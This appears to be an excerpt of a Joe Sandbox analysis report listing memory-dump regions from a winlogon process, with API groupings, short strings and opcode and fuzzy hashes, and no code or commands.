• Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
• Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
• Instruction ID: 8dc7a5a5a748a40cbc29a5a267432368ed8bc244d7968494e66c256cbaf93485
• Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
• Instruction Fuzzy Hash: 2C519333B547098BF726CF15E850E9973A0FB88B89F804159DD4A43754EB3AC945CB83
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
• Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
• Instruction ID: ea16a1a7a1a17f6f263131a3a1cfce36d3cacf334bdce0e67c9e7c118ef6d97e
• Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
• Instruction Fuzzy Hash: 70610C33A58B4886F762CB15E540B5AB7E0F789789F900115EACD53BA8DB7AC441CF82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: 613c8c001a099c7bb1652f2b5ad2a82541488477a47cebf72ef6da64e55ba237
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: 1B61DA33968B48C6F761CF19E440B5AB7A5F788748F904119EA8D43BA8DB7AC541CB82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f37e1c6386c44249f93e7a8c8070b12ec0e492f56422c91e1d25021c4f6724ae
                                                  • Instruction ID: fa9a5d2907fee9bc4b961baced023eb20950943a2e523218285e0907ba0ddb00
                                                  • Opcode Fuzzy Hash: f37e1c6386c44249f93e7a8c8070b12ec0e492f56422c91e1d25021c4f6724ae
                                                  • Instruction Fuzzy Hash: 1F61F633969B4886F761CB15E550B9AB7E0FB88749F900115FA8D43BA8DB3EC540CB83
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: a3441327fd192ba05e1bd0321bbdf2938bb54ef04919ac3b85a9ec6d852f5b6a
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 0F114F36A0874493FB258B21E40464B7770FB88B88F440026DE5D07758EB7EC94587C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: d868ca04b8d8586f6f6a390e290e58150676275038ac38a85c7b80935c32969b
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: DE115137A0874483FB258B21E4046497771FF48B98F44402AEA4D03758EB7ED545C7CA
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: f525cb24ccabdaef705eca32e391c6c3482e6c61b1592a8eb16db6a1036eaf3a
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 2151E273B417088AFB19CB25D054FADB391FB44B8DF984110EA9A57788DB7AC842C7C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: a759c82f011c931f3a48cb36091e1ef5e587e1df0f78fc6b8324226c07ede887
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 6051C133B417089AEB19CB25D084FA8B391FB54B9CF918128AA5547784DB7BC842C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 60e8b9d452b22d8066b229c291e107fc67761e130e05b0da0dcc3cb05f5680b7
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 2B51E533B917888AFB59CB15E044FAC7791FB94B9DF948110EA4A47B88D77AC841C783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: ad04fe1eb2a1edeef54e6bc75b4d769991b9c3402fe3d2ab12d2ac4a189050a6
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 6C51D03398034887FBB68F119244B9877A0FB50B9EF944116DAC967B91CB3AC452C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: ed6a1ed037bc458e94a604c567b67e28dc429d86a9db094778d64014e96594a0
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: F361B433908BC881FB628F25E540BDEB7A0FB84799F445215EBC823B55DB39C091CB82
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 10efc11f376cab87ef4acdaf2b77ccec9d4123c0fd27d91e5cae546ecccaa4a1
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: CA51B23398038887FBB68F119644B9877A1FB50B88F94811ADA5943B95C73BD553C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 2a22e60a9b3f854304751452df9d98a64753f55934e27dd4094366773aca3260
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 9C61B933908BC881EB728F15E5407DDB7A0FB85798F448219EB9817B55DB7EC192CB82
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: ff7a276064ca23684de81406a1f68796b44ce7f86f6096a08643deba12328983
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: E351C1339843888BFB768F11E644B9877A0FB50B9EF944116DA8947BD1CB3AD450D783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 60592a73bcc56e8fc24094758dd9bb65472a20c058267f86d1c17b185443617f
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 3161AE33908BC881EB22CF15E540BDAB7A0FB85B99F444215EB9913B99DB7DC190CB42
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 02134d3feda2e96eb50003ad244677908c7789116ae644b7e14578b12ac1f724
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 0E51D333A803888AFB768F51D244B987BA0FB54B9CF944119DA8D47BD5CB7AC451CB83
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 28175376d5654a325b6e3448a41641f0585f000515273b2e813776c3207c95cb
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: 25119032B5878591FB129B25E8007DB72A4FF88789FC004219E4993694EF7AC807C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                   • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: f5c0b545fa3a07ccbfa5bb088918576c4613ccf87af992a5142b58f16c0f08fa
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: F411A532B5878551FB129B25E8007DA76A5BF48748FC08429AA4983694EF3BC90BC7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                   • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 913d229e8f2f92123c0244f313f8f46853348ecc3afd0aa29f5a796bf9d5dd00
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: 6311DA3375078551FB129B25E8007DAB7A4FF84B4AFC004259E49C3695EF7AC985C783
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                   • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 0fe5e95353cfd2dd0c501b22aeddf9fd2a82a384c77f1e00d125b204ea73b71d
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: DFD1CB33B14B9889F712CFA5D440ADD37B1FB95B98F805116CE59ABB99DA35C00BC382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
